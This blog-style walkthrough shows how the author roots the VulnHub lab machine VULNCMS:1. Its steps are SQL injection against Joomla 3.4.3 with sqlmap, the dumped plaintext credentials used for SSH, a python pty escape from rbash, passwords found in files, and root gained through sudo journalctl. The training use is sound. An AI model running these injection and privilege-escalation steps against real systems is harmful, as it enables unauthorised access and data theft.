This is VULNCMS: 1 from VulnHub. We’ve got some new machines, so let’s go.


We’ve got SSH on 22; a website on 80. And then we’ve got Wordpress on 5000, Joomla on 8081 and Drupal on 9001. Where shall we start?


nmap says:

_http-generator: WordPress 5.7.2

That’s a recent version; if there was a vulnerability in WP core I’d probably have heard about it. Of course it could be a plugin, but let’s pass for now.


└─# droopescan scan drupal -u         
[+] Plugins found:                                                              

[+] Themes found:

[+] Possible version(s):

[+] Possible interesting urls found:
    Default changelog file -

[+] Scan finished (0:00:07.905186 elapsed)

A quick search doesn’t find anything obvious for version 7.54; let’s move on.


└─# joomscan --url

This turns up:

[+] Detecting Joomla Version
[++] Joomla 3.4.3

Which is vulnerable to SQLi. There are some scripts; I run sqlmap with this command:

sqlmap -u "[ordering]=&item_id=75&type_id=1&list[select]=*"  --technique=E --dbs --dump

The moon rises and falls. Seasons change. Little babies grow into adults. Eventually, the entire database is dumped. Ok yes this was my fault for not optimising the query - but it’s my time I wasted.

We get some hashes (can’t break), and this:

47,elliot,,1,5T3e!_M0un7i@N,, AND OTHER STUFF

With this, which was in users, we can SSH in as Elliot.


Elliot has rbash; don’t be like Elliot:

Last login: Thu Jun 17 11:49:58 2021 from
elliot@vuln_cms:~$ cd /
-rbash: cd: restricted
elliot@vuln_cms:~$ python3 -c 'import pty;pty.spawn("/bin/bash");'
elliot@vuln_cms:~$ cd /dev/shm

Elliot can’t run sudo. I run linpeas but get nothing very useful. I find this:

elliot@vuln_cms:/$ cd opt
elliot@vuln_cms:/opt$ ls -lash
total 12K
4.0K drwxr-xr-x  2 root root 4.0K May 31 07:59 .
4.0K drwxr-xr-x 24 root root 4.0K Jun 17 11:20 ..
4.0K -rw-r--r--  1 root root   69 May 31 07:58 8081.cred
elliot@vuln_cms:/opt$ cat 8081.cred 
Username: joomlaCMS_admin
Password: _q4gWWJuBWt8cqfbUm-cdevR?L@N7-pR

Not useful. I find this:

elliot@vuln_cms:/var/www/html/home/vulnerable$ ls -lash
total 2.0M
4.0K drwxr-xr-x 2 tyrell tyrell 4.0K May 31 07:45 .
4.0K drwxr-xr-x 3 tyrell tyrell 4.0K May 30 09:34 ..
1.3M -rw-r--r-- 1 tyrell tyrell 1.3M May 26 06:54 image1.png
 16K -rw-r--r-- 1 tyrell tyrell  15K May 26 06:55 image2.jpg
156K -rw-r--r-- 1 tyrell tyrell 153K May 26 06:55 image3.jpg
 96K -rw-r--r-- 1 tyrell tyrell  94K May 31 07:44 image4.jpg
352K -rw-r--r-- 1 tyrell tyrell 352K May 26 07:07 image5.jpg
 24K -rw-r--r-- 1 tyrell tyrell  22K May 26 07:08 image6.gif

Notice the date on image4 is different?

└─# stegseek image4.jpg           
StegSeek version 0.5
Progress: 0.00% (0 bytes)           

[i] --> Found passphrase: "123456789"
[i] Original filename: "wp_pass.txt"
[i] Extracting to "image4.jpg.out"
└─# cat image4.jpg.out           
Random URLs are helpful but 5000 times

Not useful.

Then I find this:

elliot@vuln_cms:/var/www/html/drupal/misc$ ls -lash
total 504K
4.0K drwxr-xr-x 4 tyrell tyrell 4.0K May 31 10:47 .
4.0K drwxr-xr-x 9 tyrell tyrell 4.0K May 31 09:17 ..
# snip
4.0K -rwxr-xr-x 1 tyrell tyrell  129 Feb  1  2017 tree-bottom.png
4.0K -rwxr-xr-x 1 tyrell tyrell  130 Feb  1  2017 tree.png
4.0K -rw-r--r-- 1 root   root     45 May 31 10:47 tyrell.pass
4.0K drwxr-xr-x 3 tyrell tyrell 4.0K Feb  1  2017 ui
# snip
elliot@vuln_cms:/var/www/html/drupal/misc$ cat tyrell.pass 
Username: tyrell
Password: mR_R0bo7_i5_R3@!_
elliot@vuln_cms:/var/www/html/drupal/misc$ su tyrell
tyrell@vuln_cms:/var/www/html/drupal/misc$ sudo -l
Matching Defaults entries for tyrell on vuln_cms:
    env_reset, mail_badpass,

User tyrell may run the following commands on vuln_cms:
    (root) NOPASSWD: /bin/journalctl

Definitely useful.

tyrell@vuln_cms:/var/www/html/drupal/misc$ sudo -u root /bin/journalctl
-- Logs begin at Fri 2021-05-28 12:16:41 UTC, end at Fri 2021-06-18 10:55:53 UTC
May 28 12:16:41 vuln_cms kernel: Linux version 4.15.0-143-generic (buildd@lcy01-
May 28 12:16:41 vuln_cms kernel: Command line: BOOT_IMAGE=/vmlinuz-4.15.0-143-ge
# snip
May 28 12:16:41 vuln_cms kernel: NX (Execute Disable) protection: active
# id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
Fri Jun 18 10:56:11 UTC 2021
# cd /root
# ls
# cat root.txt

And done.